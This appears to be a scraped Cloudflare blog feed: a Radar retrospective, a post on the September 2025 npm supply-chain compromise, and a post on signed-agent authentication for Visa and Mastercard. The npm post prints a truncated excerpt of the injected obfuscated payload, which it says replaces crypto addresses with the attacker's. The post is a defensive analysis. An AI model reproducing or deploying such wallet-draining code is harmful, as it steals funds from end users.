Over the three decades, the humble robots.txt file has served as something of a gatekeeper for websites, letting crawlers know if they are allowed to access content on the site, and if so, which content. Well-behaved crawlers read and parse the file, and adjust their crawling activity accordingly. Based on the robots.txt files found across Radar’s top 10,000 domains, Radar’s AI Insights page shows how many of these sites explicitly allow or disallow these AI crawlers to access content, and how complete that access/restriction is. With the ability to filter the data by domain category, this graph can provide site owners with visibility into how their peers may be dealing with these AI crawlers.

Improving Internet resilience with routing visibility

Routing is the process of selecting a path across one or more networks, and in the context of the Internet, routing selects the paths for Internet Protocol (IP) packets to travel from their origin to their destination. It is absolutely critical to the functioning of the Internet, but lots of things can go wrong, and when they do, they can take a whole network offline. (And depending on the network, a larger blast radius of sites, applications, and other service providers may be impacted.

Routing visibility provides insights into the health of a network, and its relationship to other networks. These insights can help identify or troubleshoot problems when they occur. Among the more significant things that can go wrong are route leaks and origin hijacks. Route leaks occur when a routing announcement propagates beyond its intended scope — that is, when the announcement reaches networks that it shouldn’t. An origin hijack occurs when an attacker creates fake announcements for a targeted prefix, falsely identifying an autonomous systems (AS) under their control as the origin of the prefix — in other words, the attacker claims that their network is responsible for a given set of IP addresses, which would cause traffic to those addresses to be routed to them.

In 2022 and 2023 respectively, we added route leak and origin hijack detection to Radar, providing network operators and other interested groups (such as researchers) with information to help identify which networks may be party to such events, whether as a leaker/hijacker, or a victim. And perhaps more importantly, in 2023 we also launched notifications for route leaks and origin hijacks, automatically notifying subscribers via email or webhook when such an event is detected, enabling them to take immediate action.

In 2025, we further improved this visibility by adding two additional capabilities. The first was real-time BGP route visibility, which illustrates how a given network prefix is connected to other networks — what is the route that packets take to get from that set of IP addresses to the large “tier 1” network providers? Network administrators can use this information when facing network outages, implementing new deployments, or investigating route leaks.

An AS-SET is a grouping of related networks, historically used for multiple purposes such as grouping together a list of downstream customers of a particular network provider. Our recently announced AS-SET monitoring enables network operators to monitor valid and invalid AS-SET memberships for their networks, which can help prevent misuse and issues like route leaks.

Not just pretty pictures

While Radar has been historically focused on providing clear, informative visualizations, we have also launched capabilities that enable users to get at the underlying data more directly, enabling them to use it in a more programmatic fashion. The most important one is the Radar API, launched in 2022. Requiring just an access token, users can get access to all the data shown on Radar, as well as some more advanced filters that provide more specific data, enabling them to incorporate Radar data into their own tools, websites, and applications. The example below shows a simple API call that returns the global distribution of human and bot traffic observed over the last seven days.

curl -X 'GET' \
'https://api.cloudflare.com/client/v4/radar/http/summary/bot_class?name=main&dateRange=1d' \
-H 'accept: application/json' \
-H 'Authorization: Bearer $TOKEN'

{
  "success": true,
  "errors": [],
  "result": {
    "main": {
      "human": "72.520636",
      "bot": "27.479364"
    },
    "meta": {
      "dateRange": [
        {
          "startTime": "2025-10-19T19:00:00Z",
          "endTime": "2025-10-20T19:00:00Z"
        }
      ],
      "confidenceInfo": {
        "level": null,
        "annotations": []
      },
      "normalization": "PERCENTAGE",
      "lastUpdated": "2025-10-20T19:45:00Z",
      "units": [
        {
          "name": "*",
          "value": "requests"
        }
      ]
    }
  }
}

The Model Context Protocol is a standard way to make information available to large language models (LLMs). Somewhat similar to the way an application programming interface (API) works, MCP offers a documented, standardized way for a computer program to integrate services from an external source. It essentially allows AI programs to exceed their training, enabling them to incorporate new sources of information into their decision-making and content generation, and helps them connect to external tools. The Radar MCP server allows MCP clients to gain access to Radar data and tools, enabling exploration using natural language queries.

Radar’s URL Scanner has proven to be one of its most popular tools, scanning millions of sites since launching in 2023. It allows users to safely determine whether a site may contain malicious content, as well as providing information on technologies used and insights into the site’s headers, cookies, and links. In addition to being available on Radar, it is also accessible through the API and MCP server.

Finally, Radar’s user interface has seen a number of improvements over the last several years, in service of improved usability and a better user experience. As new data sets and capabilities are launched, they are added to the search bar, allowing users to search not only for countries and ASNs, but also IP address prefixes, certificate authorities, bot names, IP addresses, and more. Initially launching with just a few default date ranges (such as last 24 hours, last 7 days, etc.), we’ve expanded the number of default options, as well as enabling the user to select custom date ranges of up to one year in length. And because the Internet is global, Radar should be too. In 2024, we launched internationalized versions of Radar, marking availability of the site in 14 languages/dialects, including downloaded and embedded content.

This is a sampling of the updates and enhancements that we have made to Radar over the last five years in support of Internet measurement, transparency, and resilience. These individual data sets and tools combine to provide one of the most comprehensive views of the Internet available. And we’re not close to being done. We’ll continue to bring additional visibility to the unseen ways that the Internet is changing by adding more tools, data sets, and visualizations, to help users answer more questions in areas including AI, performance, adoption and usage, and security.

Visit radar.cloudflare.com to explore all the great data sets, capabilities, and tools for yourself, and to use the Radar API or MCP server to incorporate Radar data into your own tools, sites, and applications. Keep an eye on the Radar changelog feed, Radar release notes, and the Cloudflare blog for news about the latest changes and launches, and don’t hesitate to reach out to us with feedback, suggestions, and feature requests.

How Cloudflare’s client-side security made the npm supply chain attack a non-event

Bashyam Anant — Fri, 24 Oct 2025 17:10:43 GMT

In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than 2 billion downloads per week. Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could also modify other packages owned by the same maintainers (using stolen npm tokens) and included code to steal developer tokens for CI/CD pipelines and cloud accounts.

As it relates to end users of your applications, the good news is that Cloudflare Page Shield, our client-side security offering will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.

export default {
 aliceblue: [240, 248, 255],
 …
 yellow: [255, 255, 0],
 yellowgreen: [154, 205, 50]
}


const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …

_{Excerpt from the injected malicious payload, along with the rest of the innocuous normal code.}_{Among other things, the payload replaces legitimate crypto addresses with attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).}

Finding needles in a 3.5 billion script haystack

Everyday, Cloudflare Page Shield assesses 3.5 billion scripts per day or 40,000 scripts per second. Of these, less than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior blog post, we preprocess JavaScript code into an Abstract Syntax Tree to train a message-passing graph convolutional network (MPGCN) that classifies a given JavaScript file as either malicious or benign.

The intuition behind using a graph-based model is to use both the structure (e.g. function calling, assertions) and code text to learn hacker patterns. For example, in the npm compromise, the malicious code injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient to techniques used not just in the npm compromise but also future compromise techniques.

Our ML model outputs the probability that a script is malicious which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious and high scores indicating benign scripts. Importantly, like many Cloudflare ML models, inferencing happens in under 0.3 seconds.

Model Evaluation

Since the initial launch, our JavaScript classifiers are constantly being evolved to optimize model evaluation metrics, in this case, F1 measure. Our current metrics are

Metric	Latest: Version 2.7	Improvement over prior version
Precision	98%	5%
Recall	90%	233%
F1	94%	123%

Some of the improvements were accomplished through:

More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic
Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure
Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest
Tweaking the evaluation criteria to maximize recall with 99% precision

Given the confusion matrix, we should expect about 2 false positives per second, if we assume ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most False Positives we encounter in this way are rather challenging. For example, scripts that read all form inputs except credit card numbers (e.g. reject input values that test true using the Luhn algorithm), injecting dynamic scripts, heavy user tracking, heavy deobfuscation, etc. User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (& testing) pipeline.

Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious (a novel attack, thus, not in the training data)..

Planned improvements

Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.

Consolidating classifiers

Over 3 years ago we launched our classifier, “Code Behaviour Analysis” for Magecart-style scripts that learns code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our message-passing graph convolutional network (MPGCN) based approach that can also classify Magecart attacks. Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of code behaviour analysis by the end of 2025.

Staying safe always

In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits, we catch its traffic within minutes. In this case, patches of the compromised npm packages were released in 2 hours or less, and given that the infected payloads had to be built into end user facing applications for end user impact, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.

Also make sure to consult our Page Shield Script detection to find malicious packages. Consult the Connections tab within Page Shield to view suspicious connections made by your applications.

_{Several scripts are marked as malicious.}

_{Several connections are marked as malicious.}

And be sure to complete the following steps:

Audit your dependency tree for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages.
Rotate any credentials that may have been exposed to your build environment.
Revoke and reissue CI/CD tokens and service keys that might have been used in build pipelines (GitHub Actions, npm tokens, cloud credentials).
Pin dependencies to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider.
Scan build logs and repos for suspicious commits/GitHub Actions changes and remove any unknown webhooks or workflows.

While vigilance is key, automated defenses provide a crucial layer of protection against fast-moving supply chain attacks. Interested in better understanding your client-side supply chain? Sign up for our free, custom Client-Side Risk Assessment.

Securing agentic commerce: helping AI Agents transact with Visa and Mastercard

Rohin Lohe — Fri, 24 Oct 2025 13:00:00 GMT

The era of agentic commerce is coming, and it brings with it significant new challenges for security. That’s why Cloudflare is partnering with Visa and Mastercard to help secure automated commerce as AI agents search, compare, and purchase on behalf of consumers.

Through our collaboration, Visa developed the Trusted Agent Protocol and Mastercard developed Agent Pay to help merchants distinguish legitimate, approved agents from malicious bots. Both Trusted Agent Protocol and Agent Pay leverage Web Bot Auth as the agent authentication layer to allow networks like Cloudflare to verify traffic from AI shopping agents that register with a payment network.

The challenges with agentic commerce

Agentic commerce is commerce driven by AI agents. As AI agents execute more transactions, merchants need to protect themselves and maintain trust with their customers. Merchants are beginning to see the promise of agentic commerce but face significant challenges:

How can they distinguish a helpful, approved AI shopping agent from a malicious bot or web crawler?
Is the agent representing a known, repeat customer or someone entirely new?
Are there particular instructions the consumer gave to their agent that the merchant should respect?

We are working with Visa and Mastercard, two of the most trusted consumer brands in payments, to address each of these challenges.

Web Bot Auth is the foundation to securing agentic commerce

In May, we shared a new proposal called Web Bot Auth to cryptographically authenticate agent traffic. Historically, agent traffic has been classified using the user agent and IP address. However, these fields can be spoofed, leading to inaccurate classifications and bot mitigations can be applied inaccurately. Web Bot Auth allows an agent to provide a stable identifier by using HTTP Message Signatures with public key cryptography.

As we spent time collaborating with the teams at Visa and Mastercard, we found that we could leverage Web Bot Auth as the foundation to ensure that each commerce agent request was verifiable, time-based, and non-replayable.

Visa’s Trusted Agent Protocol and Mastercard’s Agent Pay present three key solutions for merchants to manage agentic commerce transactions. First, merchants can identify a registered agent and distinguish whether a particular interaction is intended to browse or to pay. Second, merchants can link an agent to a consumer identity. Last, merchants can indicate to agents how a payment is expected, whether that is through a network token, browser-use guest checkout, or a micropayment.

This allows merchants that integrate with these protocols to instantly recognize a trusted agent during two key interactions: the initial browsing phase to determine product details and final costs, and the final payment interaction to complete a purchase. Ultimately, this provides merchants with the tools to verify these signatures, identify trusted interactions, and securely manage how these agents can interact with their site.

How it works: leveraging HTTP message signatures

To make this work, an ecosystem of participants need to be on the same page. It all starts with agent developers, who build the agents to shop on behalf of consumers. These agents then interact with merchants, who need a reliable way to assess the request is made on behalf of consumers. Merchants rely on networks like Cloudflare to verify the agent's cryptographic signatures and ensure the interaction is legitimate. Finally, there are payment networks like Visa and Mastercard, who can link cardholder identity to agentic commerce transactions, helping ensure that transactions are verifiable and accountable.

When developing their protocols, Visa and Mastercard needed a secure way to authenticate each agent developer and securely transmit information from the agent to the merchant’s website. That’s where we came in and worked with their teams to build upon Web Bot Auth. Web Bot Auth proposals specify how developers of bots and agents can attach their cryptographic signatures in HTTP requests by using HTTP Message Signatures.

Both Visa and Mastercard protocols require agents to register and have their public keys (referenced as the keyid in the Signature-Input header) in a well-known directory, allowing merchants and networks to fetch the keys to validate these HTTP message signatures. To start, Visa and Mastercard will be hosting their own directories for Visa-registered and Mastercard-registered agents, respectively

The newly created agents then communicate their registration, identity, and payment details with the merchant using these HTTP Message Signatures. Both protocols build on Web Bot Auth by introducing a new tag that agents must supply in the Signature-Input header, which indicates whether the agent is browsing or purchasing. Merchants can use the tag to determine whether to interact with the agent. Agents must also include the nonce field, a unique sequence included in the signature, to provide protection against replay attacks.

An agent visiting a merchant’s website to browse a catalog would include an HTTP Message Signature in their request to verify their agent is authorized to browse the merchant’s storefront on behalf of a specific Visa cardholder:

GET /path/to/resource HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 Chrome/113.0.0 MyShoppingAgent/1.1
Signature-Input: 
  sig2=("@authority" "@path"); 
  created=1735689600; 
  expires=1735693200; 
  keyid="poqkLGiymh_W0uP6PZFw-dvez3QJT5SolqXBCW38r0U"; 
  alg="Ed25519";   nonce="e8N7S2MFd/qrd6T2R3tdfAuuANngKI7LFtKYI/vowzk4IAZyadIX6wW25MwG7DCT9RUKAJ0qVkU0mEeLEIW1qg=="; 
  tag="web-bot-auth"
Signature: sig2=:jdq0SqOwHdyHr9+r5jw3iYZH6aNGKijYp/EstF4RQTQdi5N5YYKrD+mCT1HA1nZDsi6nJKuHxUi/5Syp3rLWBA==:

Trusted Agent Protocol and Agent Pay are designed for merchants to benefit from its validation mechanisms without changing their infrastructure. Instead, merchants can set the rules for agent interactions on their site and rely upon Cloudflare as the validator. For these requests, Cloudflare will run the following checks:

Confirm the presence of the Signature-Input and Signature headers.
Pull the keyid from the Signature-Input. If Cloudflare has not previously retrieved and cached the key, fetch it from the public key directory.
Confirm the current time falls between the created and expires timestamps.
Check nonce uniqueness in the cache. By checking if a nonce has been recently used, Cloudflare can reject reused or expired signatures, ensuring the request is not a malicious copy of a prior, legitimate interaction.
Check the validity of the tag, as defined by the protocol. If the agent is browsing, the tag should be agent-browser-auth. If the agent is paying, the tag should be agent-payer-auth.
Reconstruct the canonical signature base using the components from the Signature-Input header.
Perform the cryptographic ed25519 signature verification using the key supplied in keyid.

Here is an example from Visa on the flow for agent validation:

Mastercard’s Agent Pay validation flow is outlined below:

What’s next: Cloudflare’s Agent SDK & Managed Rules

We recently introduced support for x402 transactions into Cloudflare’s Agent SDK, allowing anyone building an agent to easily transact using the new x402 protocol. We will similarly be working with Visa and Mastercard over the coming months to bring support for their protocols directly to the Agents SDK. This will allow developers to manage their registered agent’s private keys and to easily create the correct HTTP message signatures to authorize their agent to browse and transact on a merchant website.

Conceptually, the requests in a Cloudflare Worker would look something like this:

/**
 * Pseudocode example of a Cloudflare Worker acting as a trusted agent.
 * This version explicitly illustrates the signing logic to show the core flow. 
 */


// Helper function to encapsulate the signing protocol logic.
async function createSignatureHeaders(targetUrl, credentials) {
    // Internally, this function would perform the detailed cryptographic steps:
    // 1. Generate timestamps and a unique nonce.
    // 2. Construct the 'Signature-Input' header string with all required parameters.
    // 3. Build the canonical 'Signature Base' string according to the spec.
    // 4. Use the private key to sign the base string.
    // 5. Return the fully formed 'Signature-Input' and 'Signature' headers.
    
    const signedHeaders = new Headers();
    
    signedHeaders.set('Signature-Input', 'sig2=(...); keyid="..."; ...');
    signedHeaders.set('Signature', 'sig2=:...');
    return signedHeaders;
}


export default {
    async fetch(request, env) {
        // 1. Load the final API endpoint and private signing credentials.
        const targetUrl = new URL(request.url).searchParams.get('target');
        const credentials = { 
            privateKey: env.PAYMENT_NETWORK_PRIVATE_KEY, 
            keyId: env.PAYMENT_NETWORK_KEY_ID 
        };


        // 2. Generate the required signature headers using the helper.
        const signatureHeaders = await createSignatureHeaders(targetUrl, credentials);


        // 3. Attach the newly created signature headers to the request for authentication.
        const signedRequestHeaders = new Headers(request.headers);
        signedRequestHeaders.set('Host', new URL(targetUrl).hostname);
        signedRequestHeaders.set('Signature-Input', signatureHeaders.get('Signature-Input'));
        signedRequestHeaders.set('Signature', signatureHeaders.get('Signature'));


       // 4. Forward the fully signed request to the protected API.
        return fetch(targetUrl, { headers: signedRequestHeaders });
    },
};

We’ll also be creating new managed rulesets for our customers that make it easy to allow agents that are using the Trusted Agent Protocol or Agent Pay. You might want to disallow most automated traffic to your storefront but not miss out on revenue opportunities from agents authorized to make a purchase on behalf of a cardholder. A managed rule would make this straightforward to implement. As the website owner, you could enable a managed rule that automatically allows all trusted agents registered with Visa or Mastercard to come to your site, passing your other bot protection & WAF rules.

These will continue to evolve, and we will incorporate feedback to ensure that agent registration and validation works seamlessly across all networks and aligns with the Web Bot Auth proposal. American Express will also be leveraging Web Bot Auth as the foundation to their agentic commerce offering.

How to get started today

You can start building with Cloudflare’s Agent SDK today, see a sample implementation of the Trusted Agent Protocol, and view the Trusted Agent Protocol and Agent Pay docs.

We look forward to your contribution and feedback, should this be engaging on GitHub, building apps, or engaging in mailing lists discussions.

The Cloudflare Blog

Cloudflare Client-Side Security: smarter detection, now open to everyone

How Cloudflare Client-Side Security works

Detecting malicious intent JavaScripts

The high cost of false positives

Adding an LLM-based second opinion for triage

Catching zero-days in the wild: The core.js router exploit

Indicators of Compromise (IOCs)

Domain-based threat intelligence free for all

Get started with Client-Side Security Advanced for PCI DSS v4

Sandboxing AI agents, 100x faster

And we have it.

Dynamic Worker Loader: a lean sandbox

100x faster

Unlimited scalability

Zero latency

It's all JavaScript

Tools defined in TypeScript

HTTP filtering and credential injection

Battle-hardened security

Helper libraries

Code Mode

Bundling

File manipulation

How are people using it?

Code Mode

Building custom automations

Running AI-generated applications

Pricing

Get Started

Dynamic Workers Starter

Dynamic Workers Playground

Powering the agents: Workers AI now runs large models, starting with Kimi K2.5

The price-performance sweet spot

The large model inference stack

Beyond the model — platform improvements for agentic workloads

Prefix caching and surfacing cached tokens

New session affinity header for higher cache hit rates

Redesigned async APIs

Try it out today

Slashing agent token costs by 98% with RFC 9457-compliant error responses

What agents see today

Sorry, you have been blocked

What we did

What the response looks like

One contract, two formats

Size reduction and token efficiency

Ten categories, clear actions

How to use it

Real-world use cases

Try it now

AI Security for Apps is now generally available

A new kind of attack surface

What AI Security for Apps does

Discovery — now free for everyone

Detection

New in GA: Custom topics detection

New in GA: Custom prompt extraction

Mitigation

Growing ecosystem

How to get started

How we rebuilt Next.js with AI in one week

The Next.js deployment problem

Introducing vinext

The numbers

Deploying to Cloudflare Workers

Frameworks are a team sport

Status: Experimental

What about pre-rendering?

Introducing Traffic-aware Pre-Rendering

Taking on the Next.js challenge, but this time with AI

Why this problem is made for AI

How we actually built it

What this means for software

Acknowledgments

Try it

Code Mode: give agents an entire API in 1,000 tokens

Server‑side Code Mode

Example: Protecting an origin from DDoS attacks

The Cloudflare MCP server

Catching zero-days in the wild: The `core.js` router exploit

`About Us`